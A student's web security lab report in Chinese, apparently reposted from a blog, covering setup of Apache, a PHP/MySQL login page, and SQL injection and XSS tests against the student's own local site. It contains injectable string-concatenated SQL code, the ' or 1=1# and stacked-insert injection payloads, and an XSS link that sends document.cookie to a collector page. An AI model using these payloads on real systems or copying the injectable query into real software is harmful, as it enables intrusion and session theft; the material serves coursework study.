20145313张雪纯Exp8 Web基础

回答问题

(1)什么是表单
表单在网页中主要负责数据采集功能。一个表单有三个基本组成部分: 表单标签:这里面包含了处理表单数据所用CGI程序的URL以及数据提交到服务器的方法。 表单域:包含了文本框、密码框、隐藏域、多行文本框、复选框、单选框、下拉选择框和文件上传框等。 表单按钮:包括提交按钮、复位按钮和一般按钮;用于将数据传送到服务器上的CGI脚本或者取消输入,还可以用表单按钮来控制其他定义了处理脚本的处理工作。

(2)浏览器可以解析运行什么语言。
html,css,javascript,如果想运行其他语言,需要安装插件。

(3)WebServer支持哪些动态语言
python、nodejs、php、ruby等。

2.实验总结与体会
这个实验太难了,Java学得不好,web一般,php没学过,为什么我要选它??思考人生...........

实验步骤

Web前端HTML

  • 使用apachectl start开启Apach,使用netstat -aptn查看端口占用.由于OPEN VAS使用80端口,把配置端口文件中把默认监听端口改成8088。
    885194-20170501173120086-245487027.png

  • 重启Apache服务
    885194-20170501173253664-1891933815.png

  • 打开127.0.0.1:8088,测试服务是否已成功启动.打开显示为上次实验生成的钓鱼网站
    885194-20170501173328273-1115777339.png

  • /var/www/html文件夹下生成一个测试文件,测试网页是否能调取文件夹中的文件
    885194-20170501174453726-2035635323.png

885194-20170501174503086-412105387.png

  • 编写一个简单的登录界面网页。
    885194-20170501173734148-1164525822.png

885194-20170501173807757-1272105752.png

  • 输入用户名密数据传输至action中的5313.php中,但是由于未定义无法显示
    885194-20170501174602961-1026442423.png

885194-20170501174609851-719477525.png

  • 测试php功能
    885194-20170502211713414-824846881.png

885194-20170502211718742-532670245.png

Web前端javascipt

  • 验证用户名、密码
    String sql="select * from users where username="+"'"+username+"'";//定义一个查询语句
    ResultSet rs=db.executeQuery(sql);//运行上面的语句
    if(rs.next())
    {
       
        if(password.equals(rs.getObject("password"))){
            response.sendRedirect("loginsuccess.jsp");       //如果密码匹配则跳转至loginsuccess.jsp
        }
        else{
            out.print("<script language='javaScript'> alert('密码错误');</script>");
            response.setHeader("refresh", "0;url=login.jsp");
        }
    }
    else 
    {
        out.print("<script language='javaScript'> alert('请输入用户名——else');</script>");
        response.setHeader("refresh", "0;url=login.jsp");
    }

Web后端

  • /etc/init.d/mysql start启动MySQL
    885194-20170501174842226-1336296051.png

  • mysql -u root –p登录MySQL,默认密码为p@ssw0rd
    885194-20170501174917304-166671327.png

  • show databases;查看基本信息,显示出有多少数据库。
    885194-20170501174955007-377436400.png

  • 建库建表

CREATE SCHEMA `库表的名称`;
CREATE TABLE `库表的名称`.`users` (
 `userid` INT NOT NULL COMMENT '',
 `username` VARCHAR(45) NULL COMMENT '',
 `password` VARCHAR(256) NULL COMMENT '',
 `enabled` VARCHAR(5) NULL COMMENT '',
 PRIMARY KEY (`userid`) COMMENT '');

885194-20170501175016836-700587469.png

885194-20170501175025632-689339858.png

  • 添加数据记录
use ‘库表名称’
insert into users(userid,username,password,enabled) values(1,'用户id',password("用户密码"),"TRUE");

885194-20170501175641226-973183241.png

  • 查看用户,修改密码,更新权限
    • 输入use mysql;,选择mysql数据库
    • 输入select user, password, host from user;,mysql库中的user表中存储着用户名、密码与权限
    • 输入UPDATE user SET password=PASSWORD("新密码") WHERE user='root';
    • 输入flush privileges;,更新权限
    • 输入quit退出
      885194-20170501175441539-1920278128.png
  • 编写登录界面login.html
    885194-20170502220008117-739309797.png

  • 编写连接数据库login.php
    885194-20170502220000929-672533766.png

  • 用添加的数据记录进行登录
    885194-20170501175918804-1717814299.png

  • 5秒后转至欢迎界面
    885194-20170502213024289-1134928163.png

SQL注入,XSS攻击测试

SQL攻击

所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

永真式攻击

885194-20170501181313398-1715341432.png

在用户名输入框中输入' or 1=1#,密码随便输入,这时候的合成后的SQL查询语句为
select * from users where username='' or 1=1#' and password=md5('')
由于以“ #”号开头直到行尾的所有内容都认为是注释,所以以上语句等价为
select * from users where username='' or 1=1
再等价为
1=1
为永真式,永远成立。
885194-20170501181555757-135012872.png

SQL注入
  • 先构造sql注入语句,在数据库中添加数据。
    ';insert into users(userid,username,password,enabled) values(999,'111',password("222"),"TRUE");#
    同上,等价于
    SELECT * FROM users WHERE username='';
    insert into users(userid,username,password,enabled) values(999,'111',password("222"),"TRUE");
    885194-20170501182012695-1866859826.png

  • 连接成功,完成注入
    885194-20170501182018664-2004347802.png

  • 使用注入的数据进行登录
    885194-20170501182024695-692168511.png

XSS攻击

XSS之所以会发生, 是因为用户输入的数据变成了代码。 所以我们需要对用户输入的数据进行HTML Encode处理。 将其中的"中括号", “单引号”,“引号” 之类的特殊字符进行编码。

  • 先建立一个网站test5313.html, 用来接收“偷”来的信息。然后构造一个恶意链接,诱使用户点击。如http://127.0.0.1:8088/logIn.php?term=<script>window.open("http://127.0.0.1:8088/test5313.php?cookie="+document.cookie)</script>.
  • 用户点击了这个URL,嵌入在URL中的恶意Javascript代码就会在用户的浏览器中执行. 其在127.0.0.1:8088/logIn.php网站的cookie, 就会被发送到127.0.0.1:8088/test5313.html网站中。即可实现对用户身份的盗取。
  • 点击构造的url,自动转至原网页
    885194-20170501182707195-1853469119.png
    用XSS实现在输入特定字符串后显示图片:
    885194-20170503005059382-679708192.png885194-20170503005121336-445133787.jpg

使用cookie进行登录

  • cookie指某些网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据(通常经过加密)。
  • 相关代码ltc已上传至git:http://git.oschina.net/alovera/webhuihuaguanli/tree/master
  • 在网站默认目录下建立logIn.php,logOut.php,loged.php

  • 首先在logIn中登录,关闭网页后再次打开不需要再次登录。想退出时点击log out即可。
    885194-20170501183346257-1931900028.png

实现发帖功能

  • 使用data.txt的写入读取实现发帖、查看已发布帖子。
    885194-20170501183644617-868614038.png

885194-20170501183651992-2040551323.png

转载于:https://www.cnblogs.com/entropy/p/6792440.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值